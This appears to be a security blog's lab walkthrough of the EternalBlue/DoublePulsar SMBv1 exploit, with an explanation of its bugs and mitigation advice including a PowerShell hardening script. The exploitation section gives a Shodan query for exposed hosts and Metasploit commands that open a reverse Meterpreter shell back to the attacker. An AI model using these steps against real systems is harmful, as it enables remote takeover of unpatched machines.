Eternal Blue DoublePulsar Exploit

Michael Koczwara

Educational purpose only.

Eternal Blue

Quick intro: Eternal Blue 101

What is Eternal Blue?

EternalBlue, sometimes stylized as ETERNALBLUE, is a cyber-attack exploit developed by the U.S. National Security Agency (NSA) according to testimony by former NSA employees. It was leaked by the Shadow Brokers hacker group on April 14, 2017, and was used as part of the worldwide WannaCry ransomware attack on May 12, 2017. The exploit was also used to help carry out the 2017 NotPetya cyberattack on June 27, 2017, and reported to be used as part of the Retefe banking trojan since at least September 5, 2017.

Shodan Search

There are still tons of vulnerable systems on the internet.

Shodan search to identify potentially unpatched and affected systems:

port:445 "SMB Version: 1" os:Windows !product:Samba


When run, Shodan reports about 974,800 systems on the internet that could be vulnerable. Note that this query only matches hosts exposing SMBv1 on port 445; it does not test for the vulnerability itself, so it cannot tell us whether these systems are patched or not.

Lab set up

In this lab, I will use the Eternal Blue exploit from GitHub and add it to the Metasploit database (to obtain a Meterpreter shell).

Lab set up:

Kali Linux

Windows 7 (64-bit)

Eternal Blue / DoublePulsar exploit from GitHub

Setting up Kali:

Download the Eternal Blue exploit from GitHub into the root directory:

cd /root

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Add the exploit to your current Metasploit database.

Install and set up the Wine emulator; it should be located in the root directory.

Run an Nmap scan to confirm that port 445 is open on the target machine.

Set up the payload:

msfconsole

use exploit/windows/smb/eternalblue_doublepulsar

info

set rhosts <target machine IP address>

set processinject lsass.exe (for 64-bit architecture)

set targetarchitecture x64

winepath — should be in the root directory

other options should be left as default


set payload windows/x64/meterpreter/reverse_tcp

set lhost <Kali IP address>

other options should be left as default

and run the exploit command.

The exploit results in remote code injection on the target and a Meterpreter shell.

How does Eternal Blue work?

Eternal Blue relies on a Windows kernel function named srv!SrvOS2FeaListSizeToNt. To see how this leads to remote code execution, let's take a quick look at how SMB works.

Server Message Block (SMB) is an application-layer network protocol mainly used to provide shared access to files, printers, and serial ports, as well as miscellaneous communications between nodes on a network.

Eternal Blue exploits three bugs:

The first is a mathematical error when the protocol tries to cast an OS/2 File Extended Attribute (FEA) list structure to an NT FEA structure in order to determine how much memory to allocate. A miscalculation creates an integer overflow that causes less memory to be allocated than expected, which in turn leads to a buffer overflow. With more data than expected being written, the extra data can overflow into adjacent memory space.

Triggering the buffer overflow is achieved thanks to the second bug, which results from a difference in the SMB protocol's definition of two related sub-commands: SMB_COM_TRANSACTION2 and SMB_COM_NT_TRANSACT.

Both have a _SECONDARY command that is used when there is too much data to include in a single packet. The crucial difference between TRANSACTION2 and NT_TRANSACT is that the latter allows a data packet twice the size of the former. This is significant because a validation error occurs if the client sends a crafted message using the NT_TRANSACT sub-command immediately before the TRANSACTION2 one.

While the protocol recognizes that two separate sub-commands have been received, it assigns the type and size of both packets (and allocates memory accordingly) based only on the type of the last one received. Since the last one is smaller, the first packet will occupy more space than it is allocated.

Once the attackers achieve this initial overflow, they can take advantage of a third bug in SMBv1 which allows heap spraying, a technique which results in allocating a chunk of memory at a given address. From here, the attacker can write and execute shellcode to take control of the system.

Summary

The Eternal Blue exploit should work on every unpatched Windows 7 and earlier system, including Windows XP (all service packs) (x86) (x64), Windows Server 2003 SP0 (x86), Windows Server 2003 SP1/SP2 (x86), Windows Server 2003 (x64), Windows Vista (x86), Windows Vista (x64), Windows Server 2008 (x86), and Windows Server 2008 R2 (x86) (x64).

How to stay secure from Eternal Blue

If possible, apply the Microsoft patch MS17-010. If that is not possible, disabling SMBv1 also mitigates the risk.
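The following PowerShell script is an added example, not part of the original post: it audits a Windows 7 SP1 / Server 2008 R2 host for the two mitigations above and disables the SMBv1 server via Microsoft's documented registry control. It assumes an elevated session and that the MS17-010 KB ids for that platform are KB4012212 (security-only) and KB4012215 (monthly rollup); on Windows 8 / Server 2012 and later the `Set-SmbServerConfiguration -EnableSMB1Protocol $false` cmdlet is the preferred control instead.

```powershell
# Added example (not from the original post). Run from an elevated PowerShell session
# on Windows 7 SP1 / Server 2008 R2, where SMBv1 is controlled through the registry.
$ErrorActionPreference = 'Stop'
$lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb1State {
    # An absent SMB1 value, or a value other than 0, means the SMBv1 server is
    # enabled (the Windows 7 default).
    $smb1 = (Get-ItemProperty -Path $lanman -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    if ($null -eq $smb1 -or $smb1 -ne 0) { 'Enabled' } else { 'Disabled' }
}

function Test-Ms17010Patch {
    # Assumed KB ids for MS17-010 on Windows 7 SP1 / Server 2008 R2. Later monthly
    # rollups supersede them, so 'NotFound' means "cannot confirm", not "vulnerable";
    # cross-check against the bulletin for your exact OS build.
    $ids = 'KB4012212', 'KB4012215'
    $found = Get-HotFix -Id $ids -ErrorAction SilentlyContinue
    if ($found) { 'Installed' } else { 'NotFound' }
}

function Disable-Smb1Server {
    # Microsoft's registry switch for the SMBv1 server component; a reboot is
    # required before the change takes effect.
    Set-ItemProperty -Path $lanman -Name SMB1 -Type DWord -Value 0 -Force
}

Write-Host "SMBv1 server : $(Get-Smb1State)"
Write-Host "MS17-010 KB  : $(Test-Ms17010Patch)"

if ((Get-Smb1State) -eq 'Enabled') {
    Disable-Smb1Server
    Write-Host 'SMBv1 disabled in the registry; reboot to apply.'
}
```

Disabling SMBv1 removes the vulnerable code path entirely, so it is the stronger control where legacy clients do not depend on it; patching closes the bug while leaving SMBv1 available.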

Written by Michael Koczwara, Senior Cyber Security Professional
